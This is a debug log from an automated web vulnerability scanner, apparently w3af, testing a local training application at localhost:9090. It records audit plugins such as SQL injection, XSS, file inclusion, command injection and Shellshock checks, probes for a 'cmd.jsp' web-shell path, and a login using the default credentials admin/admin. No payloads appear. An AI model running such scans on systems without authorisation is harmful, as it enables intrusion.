buffer_overflow.audit(did="WSSkaKpv", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 87. [Wed Feb 12 09:37:03 2020 - debug] redos.audit(did="olzpUM8h", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] buffer_overflow.audit(did="WSSkaKpv",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.01s to run [Wed Feb 12 09:37:03 2020 - debug] url_fuzzer.discover(did="XsWRvHqM",uri="http://localhost:9090/cmd.jsp") took 4.15s to run [Wed Feb 12 09:37:03 2020 - debug] oracle_discovery.discover(http://localhost:9090/cmd.jsp, did=0tuOUomU) [Wed Feb 12 09:37:03 2020 - debug] [oracle_discovery] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:03 2020 - debug] The crawl plugin: "oracle_discovery" wont be run anymore. [Wed Feb 12 09:37:03 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:03 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:03 2020 - debug] oracle_discovery.discover(did="0tuOUomU",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:37:03 2020 - debug] wsdl_finder.discover(http://localhost:9090/cmd.jsp, did=TTlhJByM) [Wed Feb 12 09:37:03 2020 - debug] ldapi.audit(did="vH2unDri",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.02s to run [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] redos.audit(did="olzpUM8h",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.04s to run [Wed Feb 12 09:37:03 2020 - debug] global_redirect.audit(did="eMsfVoNj", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eMsfVoNj) [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eMsfVoNj) [Wed Feb 12 09:37:03 2020 - debug] xpath.audit(did="dA6pVTKj", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:dA6pVTKj) [Wed Feb 12 09:37:03 2020 - debug] xpath.audit(did="dA6pVTKj",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.01s to run [Wed Feb 12 09:37:03 2020 - debug] cors_origin.audit(did="m0lZrv4E", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] htaccess_methods.audit(did="JdAvFtLz", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] global_redirect.audit(did="eMsfVoNj",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.06s to run [Wed Feb 12 09:37:03 2020 - debug] [wsdl_finder] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=770,from_cache=0,grep=1,rtt=0.13,did=a5xU0q8J) [Wed Feb 12 09:37:04 2020 - debug] dav.audit(did="V7GYbFY8", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] ssi.audit(did="ExodA3e4", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=771,from_cache=0,grep=1,rtt=0.37,did=m0lZrv4E) [Wed Feb 12 09:37:04 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:37:04 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: IID8ieWF) [Wed Feb 12 09:37:04 2020 - debug] xxe.audit(did="se6h7khT", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:04 2020 - debug] eval.audit(did="ra1QHMQx", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:04 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ra1QHMQx) [Wed Feb 12 09:37:04 2020 - debug] rosetta_flash.audit(did="PiJpI697", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] rosetta_flash.audit(did="PiJpI697",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:04 2020 - debug] xxe.audit(did="se6h7khT",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.18s to run [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=773,from_cache=0,grep=1,rtt=0.06,did=u3gCnSm2) [Wed Feb 12 09:37:04 2020 - debug] xss.audit(did="1Oag7DFz", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:04 2020 - debug] Using RLIMIT_AS memory usage limit 2347 MB for new pool process [Wed Feb 12 09:37:04 2020 - debug] eval.audit(did="ra1QHMQx",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.12s to run [Wed Feb 12 09:37:04 2020 - debug] xst.audit(did="J91Xcxs9", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] xss.audit(did="1Oag7DFz",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.07s to run [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=772,from_cache=0,grep=1,rtt=0.15,did=ElJkVGud) [Wed Feb 12 09:37:04 2020 - debug] htaccess_methods.audit(did="JdAvFtLz",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.76s to run [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=775,from_cache=0,grep=1,rtt=0.07,did=m0lZrv4E) [Wed Feb 12 09:37:04 2020 - debug] cors_origin.audit(did="m0lZrv4E",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.79s to run (0.44s 55% sending HTTP requests) [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/cmd.jsp?WSDL= returned HTTP code "404" (id=774,from_cache=0,grep=1,rtt=0.15,did=Nn4oxX2r) [Wed Feb 12 09:37:04 2020 - debug] GET http://localhost:9090/cmd.jsp?wsdl= returned HTTP code "404" (id=776,from_cache=0,grep=1,rtt=0.26,did=jRhH8sFB) [Wed Feb 12 09:37:04 2020 - debug] wsdl_finder.discover(did="TTlhJByM",uri="http://localhost:9090/cmd.jsp") took 0.84s to run [Wed Feb 12 09:37:04 2020 - debug] wordpress_enumerate_users.discover(http://localhost:9090/cmd.jsp, did=hkhQuqOu) [Wed Feb 12 09:37:04 2020 - debug] [wordpress_enumerate_users] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:04 2020 - debug] ssl_certificate.audit(did="ZUOD0US9", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:04 2020 - debug] ssl_certificate.audit(did="ZUOD0US9",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:04 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ExodA3e4) [Wed Feb 12 09:37:04 2020 - debug] xst.audit(did="J91Xcxs9",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:04 2020 - debug] text_file.flush() took 0.00s to run [Wed Feb 12 09:37:05 2020 - debug] PROPFIND http://localhost:9090/learn/vulnerability/ with data: " Select \'D..." returned HTTP code "404" (id=782,from_cache=0,grep=1,rtt=0.24,did=tjiCATaX) [Wed Feb 12 09:37:05 2020 - debug] rfi.audit(did="YRDH0Rk8", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:05 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:YRDH0Rk8) [Wed Feb 12 09:37:05 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=783,from_cache=0,grep=0,rtt=0.12,did=IID8ieWF) [Wed Feb 12 09:37:06 2020 - debug] [auth.detailed] User "admin" is NOT logged into the application, the `check_string` was not found in the HTTP response with ID 783. (did: IID8ieWF) [Wed Feb 12 09:37:06 2020 - debug] [auth.detailed] Logging into the application with user: admin (did: U8jTKgiW) [Wed Feb 12 09:37:06 2020 - debug] frontpage.audit(did="M4jdZP7M", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:06 2020 - debug] RFI using local web server for URL: http://localhost:9090/learn/vulnerability/ax_csrf [Wed Feb 12 09:37:06 2020 - debug] frontpage.audit(did="M4jdZP7M",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.06s to run [Wed Feb 12 09:37:06 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=784,from_cache=0,grep=0,rtt=0.10,did=a5xU0q8J) [Wed Feb 12 09:37:06 2020 - debug] localhost:9090 connection pool stats (free:52 / in_use:1 / max:50 / total:53) [Wed Feb 12 09:37:06 2020 - debug] Connections with more in use time: (f5adb0c09c70ca09, 0.02 sec) [Wed Feb 12 09:37:06 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 88. [Wed Feb 12 09:37:06 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:06 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:YRDH0Rk8) [Wed Feb 12 09:37:06 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 89. [Wed Feb 12 09:37:06 2020 - debug] rfi.audit(did="YRDH0Rk8",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.21s to run [Wed Feb 12 09:37:06 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=786,from_cache=1,grep=1,rtt=0.18,did=By1qTf3l) [Wed Feb 12 09:37:06 2020 - debug] wordpress_enumerate_users.discover(did="hkhQuqOu",uri="http://localhost:9090/cmd.jsp") took 0.58s to run [Wed Feb 12 09:37:06 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=785,from_cache=0,grep=0,rtt=0.02,did=JQnYVYiA) [Wed Feb 12 09:37:06 2020 - debug] file_upload.audit(did="uJcItiWA", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:06 2020 - debug] file_upload.audit(did="uJcItiWA",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:06 2020 - debug] web_diff.discover(http://localhost:9090/cmd.jsp, did=X73IVVeT) [Wed Feb 12 09:37:06 2020 - debug] [web_diff] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:06 2020 - debug] The crawl plugin: "web_diff" wont be run anymore. [Wed Feb 12 09:37:06 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:06 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:06 2020 - debug] web_diff.discover(did="X73IVVeT",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:37:07 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=787,from_cache=0,grep=0,rtt=0.30,did=a5xU0q8J) [Wed Feb 12 09:37:07 2020 - debug] Returning fresh average RTT of 0.17 seconds for mutant 4ba0ef4e6ab5fb98ca66ec8d9eb5eaac [Wed Feb 12 09:37:07 2020 - debug] csrf.audit(did="Xtqkxhmu", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:07 2020 - debug] csrf.audit(did="Xtqkxhmu",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:07 2020 - debug] dwsync_xml.discover(http://localhost:9090/cmd.jsp, did=HEzuZVhz) [Wed Feb 12 09:37:07 2020 - debug] [dwsync_xml] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:07 2020 - debug] Returning cached average RTT of 0.17 seconds for mutant 4ba0ef4e6ab5fb98ca66ec8d9eb5eaac [Wed Feb 12 09:37:07 2020 - debug] deserialization.audit(did="5bybRsjh", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:07 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:07 2020 - debug] deserialization.audit(did="5bybRsjh",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:07 2020 - debug] dwsync_xml.discover(did="HEzuZVhz",uri="http://localhost:9090/cmd.jsp") took 0.05s to run [Wed Feb 12 09:37:07 2020 - debug] pykto.discover(http://localhost:9090/cmd.jsp, did=GUUfeXO7) [Wed Feb 12 09:37:07 2020 - debug] [pykto] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:08 2020 - debug] POST http://localhost:9090/login with data: "username=admin&password=admin" returned HTTP code "302" (id=789,from_cache=0,grep=0,rtt=0.53,did=U8jTKgiW) [Wed Feb 12 09:37:08 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=201 returned HTTP code "200" (id=790,from_cache=0,grep=0,rtt=0.46,did=P8nzPH8O) [Wed Feb 12 09:37:08 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:37:08 2020 - debug] os_commanding.audit(did="2VuImwyB", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:2VuImwyB) [Wed Feb 12 09:37:08 2020 - debug] GET http://localhost:9090/learn/vulnerability/sDLTI returned HTTP code "404" (id=788,from_cache=0,grep=1,rtt=0.22,did=OoBr2Suw) [Wed Feb 12 09:37:08 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: 3wdzzNZx) [Wed Feb 12 09:37:08 2020 - debug] find_captchas.discover(did="aI2rv3vj",uri="http://localhost:9090/cmd.jsp") took 3.44s to run [Wed Feb 12 09:37:08 2020 - debug] wordpress_fullpathdisclosure.discover(http://localhost:9090/cmd.jsp, did=hK6G5i9j) [Wed Feb 12 09:37:08 2020 - debug] [wordpress_fullpathdisclosure] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:08 2020 - debug] lfi.audit(did="3L8egRYm", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:3L8egRYm) [Wed Feb 12 09:37:08 2020 - debug] dav.audit(did="V7GYbFY8",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 1.59s to run [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] os_commanding.audit(did="2VuImwyB",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.10s to run [Wed Feb 12 09:37:08 2020 - debug] sqli.audit(did="CdyV8Fgj", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CdyV8Fgj) [Wed Feb 12 09:37:08 2020 - debug] blind_sqli.audit(did="Ed4leIsU", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] pykto.discover(did="GUUfeXO7",uri="http://localhost:9090/cmd.jsp") took 0.24s to run [Wed Feb 12 09:37:08 2020 - debug] phishtank.discover(http://localhost:9090/cmd.jsp, did=4cD9ayDq) [Wed Feb 12 09:37:08 2020 - debug] [phishtank] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:08 2020 - debug] The crawl plugin: "phishtank" wont be run anymore. [Wed Feb 12 09:37:08 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:08 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:08 2020 - debug] phishtank.discover(did="4cD9ayDq",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:37:08 2020 - debug] lfi.audit(did="3L8egRYm",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.14s to run [Wed Feb 12 09:37:08 2020 - debug] sqli.audit(did="CdyV8Fgj",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.09s to run [Wed Feb 12 09:37:08 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=793,from_cache=0,grep=0,rtt=0.14,did=3wdzzNZx) [Wed Feb 12 09:37:08 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "200" (id=791,from_cache=0,grep=1,rtt=0.12,did=a5xU0q8J) [Wed Feb 12 09:37:08 2020 - debug] [id: 140100582497040] HTTP response delay was 0.12. (lower, expected, upper): 8.00, 8.00, 16.22. [Wed Feb 12 09:37:08 2020 - debug] [did: a5xU0q8J] [id: 140100582497040] Failed to control HTTP response delay for URL http://localhost:9090/learn/vulnerability/ax_csrf - parameter "User-Agent" for 8 seconds using , response wait time was: 0.119121074677 seconds and response ID: 791. [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] generic.audit(did="vx4xaJ7Y", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:08 2020 - debug] digit_sum.discover(http://localhost:9090/cmd.jsp, did=8xW5RLLq) [Wed Feb 12 09:37:08 2020 - debug] [digit_sum] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:08 2020 - debug] phishing_vector.audit(did="DHbGP62T", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:08 2020 - debug] blind_sqli.audit(did="Ed4leIsU",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.13s to run [Wed Feb 12 09:37:08 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: 3wdzzNZx) [Wed Feb 12 09:37:08 2020 - debug] Login success for admin [Wed Feb 12 09:37:08 2020 - debug] detailed._login() took 1.76s to run [Wed Feb 12 09:37:09 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "200" (id=792,from_cache=0,grep=1,rtt=0.15,did=a5xU0q8J) [Wed Feb 12 09:37:09 2020 - debug] [id: 140100583785936] HTTP response delay was 0.15. (lower, expected, upper): 8.00, 8.00, 16.22. [Wed Feb 12 09:37:09 2020 - debug] [did: a5xU0q8J] [id: 140100583785936] Failed to control HTTP response delay for URL http://localhost:9090/learn/vulnerability/ax_csrf - parameter "User-Agent" for 8 seconds using , response wait time was: 0.146822929382 seconds and response ID: 792. [Wed Feb 12 09:37:09 2020 - debug] shell_shock.audit(did="a5xU0q8J",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 2.42s to run (0.92s 37% sending HTTP requests) [Wed Feb 12 09:37:09 2020 - debug] format_string.audit(did="WynhByBF", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:09 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:WynhByBF) [Wed Feb 12 09:37:09 2020 - debug] format_string.audit(did="WynhByBF",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:09 2020 - debug] generic.audit(did="vx4xaJ7Y",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.02s to run [Wed Feb 12 09:37:09 2020 - debug] websocket_hijacking.audit(did="YwDNsgbY", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] websocket_hijacking.audit(did="YwDNsgbY",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:09 2020 - debug] shell_shock.audit(did="Nxo90dQW", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:09 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:DHbGP62T) [Wed Feb 12 09:37:09 2020 - debug] Finished audit.phishing_vector (did=DHbGP62T) [Wed Feb 12 09:37:09 2020 - debug] phishing_vector.audit(did="DHbGP62T",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.03s to run [Wed Feb 12 09:37:09 2020 - debug] memcachei.audit(did="zbEZQKdo", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:09 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:zbEZQKdo) [Wed Feb 12 09:37:09 2020 - debug] memcachei.audit(did="zbEZQKdo",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:09 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=794,from_cache=1,grep=1,rtt=0.18,did=WEveI3wV) [Wed Feb 12 09:37:09 2020 - debug] wordpress_fullpathdisclosure.discover(did="hK6G5i9j",uri="http://localhost:9090/cmd.jsp") took 0.52s to run [Wed Feb 12 09:37:09 2020 - debug] open_api.discover(http://localhost:9090/cmd.jsp, did=4fYp28eE) [Wed Feb 12 09:37:09 2020 - debug] [open_api] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:09 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=796,from_cache=0,grep=1,rtt=0.07,did=so2ezsjl) [Wed Feb 12 09:37:09 2020 - debug] un_ssl.audit(did="joj9nBn6", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] un_ssl.audit(did="joj9nBn6",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:09 2020 - debug] ldapi.audit(did="Iu9UhgNr", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:09 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:09 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Iu9UhgNr) [Wed Feb 12 09:37:09 2020 - debug] ldapi.audit(did="Iu9UhgNr",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:10 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=795,from_cache=0,grep=1,rtt=0.06,did=Nxo90dQW) [Wed Feb 12 09:37:10 2020 - debug] buffer_overflow.audit(did="GI1CjbT3", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] digit_sum.discover(did="8xW5RLLq",uri="http://localhost:9090/cmd.jsp") took 0.28s to run [Wed Feb 12 09:37:10 2020 - debug] dot_ds_store.discover(http://localhost:9090/cmd.jsp, did=V76YGPhm) [Wed Feb 12 09:37:10 2020 - debug] [dot_ds_store] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:10 2020 - debug] dot_ds_store.discover(did="V76YGPhm",uri="http://localhost:9090/cmd.jsp") took 0.03s to run [Wed Feb 12 09:37:10 2020 - debug] ghdb.discover(http://localhost:9090/cmd.jsp, did=SG4VJthO) [Wed Feb 12 09:37:10 2020 - debug] [ghdb] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:37:10 2020 - debug] The crawl plugin: "ghdb" wont be run anymore. [Wed Feb 12 09:37:10 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:10 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:10 2020 - debug] ghdb.discover(did="SG4VJthO",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:37:10 2020 - debug] server_header.discover(http://localhost:9090/cmd.jspx, did=gqyjyzYM) [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] redos.audit(did="O8aK9tVz", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] global_redirect.audit(did="ZXhE4ob3", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ZXhE4ob3) [Wed Feb 12 09:37:10 2020 - debug] buffer_overflow.audit(did="GI1CjbT3",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.08s to run [Wed Feb 12 09:37:10 2020 - debug] xpath.audit(did="RmA1BUve", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:RmA1BUve) [Wed Feb 12 09:37:10 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 90. [Wed Feb 12 09:37:10 2020 - debug] cors_origin.audit(did="atzzIWXv", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] xpath.audit(did="RmA1BUve",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.14s to run [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] redos.audit(did="O8aK9tVz",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.19s to run [Wed Feb 12 09:37:10 2020 - debug] htaccess_methods.audit(did="G79FGirz", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] dav.audit(did="isB0wzxn", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] ssi.audit(did="NZNj74lh", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] 